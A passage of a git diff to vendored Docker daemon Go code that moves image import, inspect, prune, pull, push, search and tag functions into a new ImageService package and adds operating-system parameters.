err != nil { break } diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/images/image_import.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/import.go rename to vendor/github.com/docker/docker/daemon/images/image_import.go index c93322b92e..8d54e0704f 100644 --- a/vendor/github.com/docker/docker/daemon/import.go +++ b/vendor/github.com/docker/docker/daemon/images/image_import.go @@ -1,58 +1,63 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "encoding/json" - "errors" "io" "net/http" "net/url" "runtime" + "strings" "time" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types/container" "github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/dockerversion" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/streamformatter" - "github.com/docker/docker/reference" + "github.com/pkg/errors" ) // ImportImage imports an image, getting the archived layer data either from // inConfig (if src is "-"), or from a URI specified in src. Progress output is // written to outStream. Repository and tag names can optionally be given in // the repo and tag arguments, respectively. -func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { +func (i *ImageService) ImportImage(src string, repository, os string, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { var ( - sf = streamformatter.NewJSONStreamFormatter() rc io.ReadCloser resp *http.Response newRef reference.Named ) + // Default the operating system if not supplied. 
+ if os == "" { + os = runtime.GOOS + } + if repository != "" { var err error - newRef, err = reference.ParseNamed(repository) + newRef, err = reference.ParseNormalizedNamed(repository) if err != nil { - return err + return errdefs.InvalidParameter(err) } - if _, isCanonical := newRef.(reference.Canonical); isCanonical { - return errors.New("cannot import digest reference") + return errdefs.InvalidParameter(errors.New("cannot import digest reference")) } if tag != "" { newRef, err = reference.WithTag(newRef, tag) if err != nil { - return err + return errdefs.InvalidParameter(err) } } } - config, err := dockerfile.BuildFromConfig(&container.Config{}, changes) + config, err := dockerfile.BuildFromConfig(&container.Config{}, changes, os) if err != nil { return err } @@ -60,21 +65,20 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string rc = inConfig } else { inConfig.Close() + if len(strings.Split(src, "://")) == 1 { + src = "http://" + src + } u, err := url.Parse(src) if err != nil { - return err + return errdefs.InvalidParameter(err) } - if u.Scheme == "" { - u.Scheme = "http" - u.Host = src - u.Path = "" - } - outStream.Write(sf.FormatStatus("", "Downloading from %s", u)) - resp, err = httputils.Download(u.String()) + + resp, err = remotecontext.GetWithStatusError(u.String()) if err != nil { return err } - progressOutput := sf.NewProgressOutput(outStream, true) + outStream.Write(streamformatter.FormatStatus("", "Downloading from %s", u)) + progressOutput := streamformatter.NewJSONProgressOutput(outStream, true) rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing") } @@ -87,12 +91,11 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string if err != nil { return err } - // TODO: support windows baselayer? 
- l, err := daemon.layerStore.Register(inflatedLayerData, "") + l, err := i.layerStores[os].Register(inflatedLayerData, "") if err != nil { return err } - defer layer.ReleaseAndLog(daemon.layerStore, l) + defer layer.ReleaseAndLog(i.layerStores[os], l) created := time.Now().UTC() imgConfig, err := json.Marshal(&image.Image{ @@ -100,7 +103,7 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string DockerVersion: dockerversion.Version, Config: config, Architecture: runtime.GOARCH, - OS: runtime.GOOS, + OS: os, Created: created, Comment: msg, }, @@ -117,19 +120,19 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string return err } - id, err := daemon.imageStore.Create(imgConfig) + id, err := i.imageStore.Create(imgConfig) if err != nil { return err } // FIXME: connect with commit code and call refstore directly if newRef != nil { - if err := daemon.TagImageWithReference(id, newRef); err != nil { + if err := i.TagImageWithReference(id, newRef); err != nil { return err } } - daemon.LogImageEvent(id.String(), id.String(), "import") - outStream.Write(sf.FormatStatus("", id.String())) + i.LogImageEvent(id.String(), id.String(), "import") + outStream.Write(streamformatter.FormatStatus("", id.String())) return nil } diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/images/image_inspect.go similarity index 53% rename from vendor/github.com/docker/docker/daemon/image_inspect.go rename to vendor/github.com/docker/docker/daemon/images/image_inspect.go index ebf912469c..16c4c9b2dc 100644 --- a/vendor/github.com/docker/docker/daemon/image_inspect.go +++ b/vendor/github.com/docker/docker/daemon/images/image_inspect.go @@ -1,31 +1,35 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( - "fmt" "time" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" + "github.com/docker/docker/image" 
"github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // LookupImage looks up an image by name and returns it as an ImageInspect // structure. -func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { - img, err := daemon.GetImage(name) +func (i *ImageService) LookupImage(name string) (*types.ImageInspect, error) { + img, err := i.GetImage(name) if err != nil { - return nil, fmt.Errorf("No such image: %s", name) + return nil, errors.Wrapf(err, "no such image: %s", name) } - - refs := daemon.referenceStore.References(img.ID().Digest()) + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } + refs := i.referenceStore.References(img.ID().Digest()) repoTags := []string{} repoDigests := []string{} for _, ref := range refs { switch ref.(type) { case reference.NamedTagged: - repoTags = append(repoTags, ref.String()) + repoTags = append(repoTags, reference.FamiliarString(ref)) case reference.Canonical: - repoDigests = append(repoDigests, ref.String()) + repoDigests = append(repoDigests, reference.FamiliarString(ref)) } } @@ -33,11 +37,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { var layerMetadata map[string]string layerID := img.RootFS.ChainID() if layerID != "" { - l, err := daemon.layerStore.Get(layerID) + l, err := i.layerStores[img.OperatingSystem()].Get(layerID) if err != nil { return nil, err } - defer layer.ReleaseAndLog(daemon.layerStore, l) + defer layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) size, err = l.Size() if err != nil { return nil, err @@ -54,6 +58,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { comment = img.History[len(img.History)-1].Comment } + lastUpdated, err := i.imageStore.GetLastUpdated(img.ID()) + if err != nil { + return nil, err + } + imageInspect := &types.ImageInspect{ ID: img.ID().String(), 
RepoTags: repoTags, @@ -67,16 +76,29 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { Author: img.Author, Config: img.Config, Architecture: img.Architecture, - Os: img.OS, + Os: img.OperatingSystem(), OsVersion: img.OSVersion, Size: size, VirtualSize: size, // TODO: field unused, deprecate RootFS: rootFSToAPIType(img.RootFS), + Metadata: types.ImageMetadata{ + LastTagTime: lastUpdated, + }, } - imageInspect.GraphDriver.Name = daemon.GraphDriverName() - + imageInspect.GraphDriver.Name = i.layerStores[img.OperatingSystem()].DriverName() imageInspect.GraphDriver.Data = layerMetadata return imageInspect, nil } + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_prune.go b/vendor/github.com/docker/docker/daemon/images/image_prune.go new file mode 100644 index 0000000000..313494f2f4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_prune.go @@ -0,0 +1,211 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "fmt" + "sync/atomic" + "time" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +var imagesAcceptedFilters = map[string]bool{ + "dangling": true, + "label": true, + "label!": true, + "until": true, +} + +// errPruneRunning is returned when a prune request is received while +// one is in progress +var errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running")) + +// 
ImagesPrune removes unused images +func (i *ImageService) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (*types.ImagesPruneReport, error) { + if !atomic.CompareAndSwapInt32(&i.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&i.pruneRunning, 0) + + // make sure that only accepted filters have been received + err := pruneFilters.Validate(imagesAcceptedFilters) + if err != nil { + return nil, err + } + + rep := &types.ImagesPruneReport{} + + danglingOnly := true + if pruneFilters.Contains("dangling") { + if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { + danglingOnly = false + } else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { + return nil, invalidFilter{"dangling", pruneFilters.Get("dangling")} + } + } + + until, err := getUntilFromPruneFilters(pruneFilters) + if err != nil { + return nil, err + } + + var allImages map[image.ID]*image.Image + if danglingOnly { + allImages = i.imageStore.Heads() + } else { + allImages = i.imageStore.Map() + } + + // Filter intermediary images and get their unique size + allLayers := make(map[layer.ChainID]layer.Layer) + for _, ls := range i.layerStores { + for k, v := range ls.Map() { + allLayers[k] = v + } + } + topImages := map[image.ID]*image.Image{} + for id, img := range allImages { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + dgst := digest.Digest(id) + if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 { + continue + } + if !until.IsZero() && img.Created.After(until) { + continue + } + if img.Config != nil && !matchLabels(pruneFilters, img.Config.Labels) { + continue + } + topImages[id] = img + } + } + + canceled := false +deleteImagesLoop: + for id := range topImages { + select { + case <-ctx.Done(): + // we still want to calculate freed size and return the data + canceled = true + break deleteImagesLoop + default: + } + + 
deletedImages := []types.ImageDeleteResponseItem{} + refs := i.referenceStore.References(id.Digest()) + if len(refs) > 0 { + shouldDelete := !danglingOnly + if !shouldDelete { + hasTag := false + for _, ref := range refs { + if _, ok := ref.(reference.NamedTagged); ok { + hasTag = true + break + } + } + + // Only delete if it's untagged (i.e. repo:) + shouldDelete = !hasTag + } + + if shouldDelete { + for _, ref := range refs { + imgDel, err := i.ImageDelete(ref.String(), false, true) + if imageDeleteFailed(ref.String(), err) { + continue + } + deletedImages = append(deletedImages, imgDel...) + } + } + } else { + hex := id.Digest().Hex() + imgDel, err := i.ImageDelete(hex, false, true) + if imageDeleteFailed(hex, err) { + continue + } + deletedImages = append(deletedImages, imgDel...) + } + + rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) + } + + // Compute how much space was freed + for _, d := range rep.ImagesDeleted { + if d.Deleted != "" { + chid := layer.ChainID(d.Deleted) + if l, ok := allLayers[chid]; ok { + diffSize, err := l.DiffSize() + if err != nil { + logrus.Warnf("failed to get layer %s size: %v", chid, err) + continue + } + rep.SpaceReclaimed += uint64(diffSize) + } + } + } + + if canceled { + logrus.Debugf("ImagesPrune operation cancelled: %#v", *rep) + } + + return rep, nil +} + +func imageDeleteFailed(ref string, err error) bool { + switch { + case err == nil: + return false + case errdefs.IsConflict(err): + return true + default: + logrus.Warnf("failed to prune image %s: %v", ref, err) + return true + } +} + +func matchLabels(pruneFilters filters.Args, labels map[string]string) bool { + if !pruneFilters.MatchKVList("label", labels) { + return false + } + // By default MatchKVList will return true if field (like 'label!') does not exist + // So we have to add additional Contains("label!") check + if pruneFilters.Contains("label!") { + if pruneFilters.MatchKVList("label!", labels) { + return false + } + } + return true +} + +func 
getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) { + until := time.Time{} + if !pruneFilters.Contains("until") { + return until, nil + } + untilFilters := pruneFilters.Get("until") + if len(untilFilters) > 1 { + return until, fmt.Errorf("more than one until filter specified") + } + ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now()) + if err != nil { + return until, err + } + seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0) + if err != nil { + return until, err + } + until = time.Unix(seconds, nanoseconds) + return until, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/images/image_pull.go similarity index 50% rename from vendor/github.com/docker/docker/daemon/image_pull.go rename to vendor/github.com/docker/docker/daemon/images/image_pull.go index 2157d15974..238c38b6b3 100644 --- a/vendor/github.com/docker/docker/daemon/image_pull.go +++ b/vendor/github.com/docker/docker/daemon/images/image_pull.go @@ -1,81 +1,57 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( + "context" "io" + "runtime" "strings" + "time" dist "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/builder" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" ) // PullImage initiates a pull operation. image is the repository name to pull, and // tag may be either empty, or indicate a specific tag to pull. 
-func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { +func (i *ImageService) PullImage(ctx context.Context, image, tag, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + start := time.Now() // Special case: "pull -a" may send an image name with a // trailing :. This is ugly, but let's not break API // compatibility. image = strings.TrimSuffix(image, ":") - ref, err := reference.ParseNamed(image) + ref, err := reference.ParseNormalizedNamed(image) if err != nil { - return err + return errdefs.InvalidParameter(err) } if tag != "" { // The "tag" could actually be a digest. var dgst digest.Digest - dgst, err = digest.ParseDigest(tag) + dgst, err = digest.Parse(tag) if err == nil { ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst) } else { ref, err = reference.WithTag(ref, tag) } if err != nil { - return err + return errdefs.InvalidParameter(err) } } - return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream) -} - -// PullOnBuild tells Docker to pull image referenced by `name`. 
-func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) { - ref, err := reference.ParseNamed(name) - if err != nil { - return nil, err - } - ref = reference.WithDefaultTag(ref) - - pullRegistryAuth := &types.AuthConfig{} - if len(authConfigs) > 0 { - // The request came with a full auth config file, we prefer to use that - repoInfo, err := daemon.RegistryService.ResolveRepository(ref) - if err != nil { - return nil, err - } - - resolvedConfig := registry.ResolveAuthConfig( - authConfigs, - repoInfo.Index, - ) - pullRegistryAuth = &resolvedConfig - } - - if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil { - return nil, err - } - return daemon.GetImage(name) + err = i.pullImageWithReference(ctx, ref, os, metaHeaders, authConfig, outStream) + imageActions.WithValues("pull").UpdateSince(start) + return err } -func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { +func (i *ImageService) pullImageWithReference(ctx context.Context, ref reference.Named, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { // Include a buffer so that slow client connections don't affect // transfer performance. progressChan := make(chan progress.Progress, 100) @@ -89,19 +65,25 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference. close(writesDone) }() + // Default to the host OS platform in case it hasn't been populated with an explicit value. 
+ if os == "" { + os = runtime.GOOS + } + imagePullConfig := &distribution.ImagePullConfig{ Config: distribution.Config{ MetaHeaders: metaHeaders, AuthConfig: authConfig, ProgressOutput: progress.ChanOutput(progressChan), - RegistryService: daemon.RegistryService, - ImageEventLogger: daemon.LogImageEvent, - MetadataStore: daemon.distributionMetadataStore, - ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), - ReferenceStore: daemon.referenceStore, + RegistryService: i.registryService, + ImageEventLogger: i.LogImageEvent, + MetadataStore: i.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(i.imageStore), + ReferenceStore: i.referenceStore, }, - DownloadManager: daemon.downloadManager, + DownloadManager: i.downloadManager, Schema2Types: distribution.ImageTypes, + OS: os, } err := distribution.Pull(ctx, ref, imagePullConfig) @@ -111,19 +93,19 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference. } // GetRepository returns a repository from the registry. 
-func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) { +func (i *ImageService) GetRepository(ctx context.Context, ref reference.Named, authConfig *types.AuthConfig) (dist.Repository, bool, error) { // get repository info - repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + repoInfo, err := i.registryService.ResolveRepository(ref) if err != nil { return nil, false, err } // makes sure name is not empty or `scratch` - if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil { - return nil, false, err + if err := distribution.ValidateRepoName(repoInfo.Name); err != nil { + return nil, false, errdefs.InvalidParameter(err) } // get endpoints - endpoints, err := daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + endpoints, err := i.registryService.LookupPullEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return nil, false, err } diff --git a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/images/image_push.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/image_push.go rename to vendor/github.com/docker/docker/daemon/images/image_push.go index e6382c7f27..4c7be8d2e9 100644 --- a/vendor/github.com/docker/docker/daemon/image_push.go +++ b/vendor/github.com/docker/docker/daemon/images/image_push.go @@ -1,20 +1,22 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( + "context" "io" + "time" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" - "golang.org/x/net/context" ) // PushImage initiates a push operation on the repository named localName. 
-func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { - ref, err := reference.ParseNamed(image) +func (i *ImageService) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + start := time.Now() + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return err } @@ -44,20 +46,21 @@ func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHead MetaHeaders: metaHeaders, AuthConfig: authConfig, ProgressOutput: progress.ChanOutput(progressChan), - RegistryService: daemon.RegistryService, - ImageEventLogger: daemon.LogImageEvent, - MetadataStore: daemon.distributionMetadataStore, - ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), - ReferenceStore: daemon.referenceStore, + RegistryService: i.registryService, + ImageEventLogger: i.LogImageEvent, + MetadataStore: i.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(i.imageStore), + ReferenceStore: i.referenceStore, }, ConfigMediaType: schema2.MediaTypeImageConfig, - LayerStore: distribution.NewLayerProviderFromStore(daemon.layerStore), - TrustKey: daemon.trustKey, - UploadManager: daemon.uploadManager, + LayerStores: distribution.NewLayerProvidersFromStores(i.layerStores), + TrustKey: i.trustKey, + UploadManager: i.uploadManager, } err = distribution.Push(ctx, ref, imagePushConfig) close(progressChan) <-writesDone + imageActions.WithValues("push").UpdateSince(start) return err } diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/images/image_search.go similarity index 66% rename from vendor/github.com/docker/docker/daemon/search.go rename to vendor/github.com/docker/docker/daemon/images/image_search.go index 5d2ac5d222..8b65ec709c 100644 --- 
a/vendor/github.com/docker/docker/daemon/search.go +++ b/vendor/github.com/docker/docker/daemon/images/image_search.go @@ -1,11 +1,9 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( - "fmt" + "context" "strconv" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" registrytypes "github.com/docker/docker/api/types/registry" @@ -20,11 +18,14 @@ var acceptedSearchFilterTags = map[string]bool{ // SearchRegistryForImages queries the registry for images matching // term. authConfig is used to login. -func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, +// +// TODO: this could be implemented in a registry service instead of the image +// service. +func (i *ImageService) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, headers map[string][]string) (*registrytypes.SearchResults, error) { - searchFilters, err := filters.FromParam(filtersArgs) + searchFilters, err := filters.FromJSON(filtersArgs) if err != nil { return nil, err } @@ -34,26 +35,26 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s var isAutomated, isOfficial bool var hasStarFilter = 0 - if searchFilters.Include("is-automated") { + if searchFilters.Contains("is-automated") { if searchFilters.UniqueExactMatch("is-automated", "true") { isAutomated = true } else if !searchFilters.UniqueExactMatch("is-automated", "false") { - return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated")) + return nil, invalidFilter{"is-automated", searchFilters.Get("is-automated")} } } - if searchFilters.Include("is-official") { + if searchFilters.Contains("is-official") { if searchFilters.UniqueExactMatch("is-official", "true") { isOfficial = true } else if !searchFilters.UniqueExactMatch("is-official", "false") { - return nil, 
fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official")) + return nil, invalidFilter{"is-official", searchFilters.Get("is-official")} } } - if searchFilters.Include("stars") { + if searchFilters.Contains("stars") { hasStars := searchFilters.Get("stars") for _, hasStar := range hasStars { iHasStar, err := strconv.Atoi(hasStar) if err != nil { - return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar) + return nil, invalidFilter{"stars", hasStar} } if iHasStar > hasStarFilter { hasStarFilter = iHasStar @@ -61,24 +62,24 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s } } - unfilteredResult, err := daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) + unfilteredResult, err := i.registryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) if err != nil { return nil, err } filteredResults := []registrytypes.SearchResult{} for _, result := range unfilteredResult.Results { - if searchFilters.Include("is-automated") { + if searchFilters.Contains("is-automated") { if isAutomated != result.IsAutomated { continue } } - if searchFilters.Include("is-official") { + if searchFilters.Contains("is-official") { if isOfficial != result.IsOfficial { continue } } - if searchFilters.Include("stars") { + if searchFilters.Contains("stars") { if result.StarCount < hasStarFilter { continue } diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/images/image_search_test.go similarity index 97% rename from vendor/github.com/docker/docker/daemon/search_test.go rename to vendor/github.com/docker/docker/daemon/images/image_search_test.go index f5aa85a61e..4fef86b6f2 100644 --- a/vendor/github.com/docker/docker/daemon/search_test.go +++ b/vendor/github.com/docker/docker/daemon/images/image_search_test.go @@ -1,12 +1,11 @@ -package daemon +package images // import 
"github.com/docker/docker/daemon/images" import ( - "fmt" + "context" + "errors" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" "github.com/docker/docker/registry" @@ -23,7 +22,7 @@ type FakeService struct { func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { if s.shouldReturnError { - return nil, fmt.Errorf("Search unknown error") + return nil, errors.New("Search unknown error") } return ®istrytypes.SearchResults{ Query: s.term, @@ -76,8 +75,8 @@ func TestSearchRegistryForImagesErrors(t *testing.T) { }, } for index, e := range errorCases { - daemon := &Daemon{ - RegistryService: &FakeService{ + daemon := &ImageService{ + registryService: &FakeService{ shouldReturnError: e.shouldReturnError, }, } @@ -322,8 +321,8 @@ func TestSearchRegistryForImages(t *testing.T) { }, } for index, s := range successCases { - daemon := &Daemon{ - RegistryService: &FakeService{ + daemon := &ImageService{ + registryService: &FakeService{ term: term, results: s.registryResults, }, diff --git a/vendor/github.com/docker/docker/daemon/images/image_tag.go b/vendor/github.com/docker/docker/daemon/images/image_tag.go new file mode 100644 index 0000000000..4693611c3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_tag.go @@ -0,0 +1,41 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/distribution/reference" + "github.com/docker/docker/image" +) + +// TagImage creates the tag specified by newTag, pointing to the image named +// imageName (alternatively, imageName can also be an image ID). 
+func (i *ImageService) TagImage(imageName, repository, tag string) (string, error) { + img, err := i.GetImage(imageName) + if err != nil { + return "", err + } + + newTag, err := reference.ParseNormalizedNamed(repository) + if err != nil { + return "", err + } + if tag != "" { + if newTag, err = reference.WithTag(reference.TrimNamed(newTag), tag); err != nil { + return "", err + } + } + + err = i.TagImageWithReference(img.ID(), newTag) + return reference.FamiliarString(newTag), err +} + +// TagImageWithReference adds the given reference to the image ID provided. +func (i *ImageService) TagImageWithReference(imageID image.ID, newTag reference.Named) error { + if err := i.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { + return err + } + + if err := i.imageStore.SetLastUpdated(imageID); err != nil { + return err + } + i.LogImageEvent(imageID.String(), reference.FamiliarString(newTag), "tag") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_unix.go b/vendor/github.com/docker/docker/daemon/images/image_unix.go new file mode 100644 index 0000000000..3f577271a2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_unix.go @@ -0,0 +1,45 @@ +// +build linux freebsd + +package images // import "github.com/docker/docker/daemon/images" + +import ( + "runtime" + + "github.com/sirupsen/logrus" +) + +// GetContainerLayerSize returns the real size & virtual size of the container. +func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) { + var ( + sizeRw, sizeRootfs int64 + err error + ) + + // Safe to index by runtime.GOOS as Unix hosts don't support multiple + // container operating systems. 
+ rwlayer, err := i.layerStores[runtime.GOOS].GetRWLayer(containerID) + if err != nil { + logrus.Errorf("Failed to compute size of container rootfs %v: %v", containerID, err) + return sizeRw, sizeRootfs + } + defer i.layerStores[runtime.GOOS].ReleaseRWLayer(rwlayer) + + sizeRw, err = rwlayer.Size() + if err != nil { + logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", + i.layerStores[runtime.GOOS].DriverName(), containerID, err) + // FIXME: GetSize should return an error. Not changing it now in case + // there is a side-effect. + sizeRw = -1 + } + + if parent := rwlayer.Parent(); parent != nil { + sizeRootfs, err = parent.Size() + if err != nil { + sizeRootfs = -1 + } else if sizeRw != -1 { + sizeRootfs += sizeRw + } + } + return sizeRw, sizeRootfs +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_windows.go b/vendor/github.com/docker/docker/daemon/images/image_windows.go new file mode 100644 index 0000000000..6f4be49736 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_windows.go @@ -0,0 +1,41 @@ +package images + +import ( + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// GetContainerLayerSize returns real size & virtual size +func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) { + // TODO Windows + return 0, 0 +} + +// GetLayerFolders returns the layer folders from an image RootFS +func (i *ImageService) GetLayerFolders(img *image.Image, rwLayer layer.RWLayer) ([]string, error) { + folders := []string{} + max := len(img.RootFS.DiffIDs) + for index := 1; index <= max; index++ { + // FIXME: why does this mutate the RootFS? 
+ img.RootFS.DiffIDs = img.RootFS.DiffIDs[:index] + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, errors.Wrapf(system.ErrNotSupportedOperatingSystem, "cannot get layerpath for ImageID %s", img.RootFS.ChainID()) + } + layerPath, err := layer.GetLayerPath(i.layerStores[img.OperatingSystem()], img.RootFS.ChainID()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get layer path from graphdriver %s for ImageID %s", i.layerStores[img.OperatingSystem()], img.RootFS.ChainID()) + } + // Reverse order, expecting parent first + folders = append([]string{layerPath}, folders...) + } + if rwLayer == nil { + return nil, errors.New("RWLayer is unexpectedly nil") + } + m, err := rwLayer.Metadata() + if err != nil { + return nil, errors.Wrap(err, "failed to get layer metadata") + } + return append(folders, m["dir"]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images/images.go similarity index 71% rename from vendor/github.com/docker/docker/daemon/images.go rename to vendor/github.com/docker/docker/daemon/images/images.go index 88fb8f8e91..49212341c5 100644 --- a/vendor/github.com/docker/docker/daemon/images.go +++ b/vendor/github.com/docker/docker/daemon/images/images.go @@ -1,4 +1,4 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "encoding/json" @@ -14,6 +14,7 @@ import ( "github.com/docker/docker/container" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" ) var acceptedImageFilterTags = map[string]bool{ @@ -33,8 +34,8 @@ func (r byCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created } // Map returns a map of all images in the ImageStore -func (daemon *Daemon) Map() map[image.ID]*image.Image { - return daemon.imageStore.Map() +func (i *ImageService) Map() map[image.ID]*image.Image { + return i.imageStore.Map() 
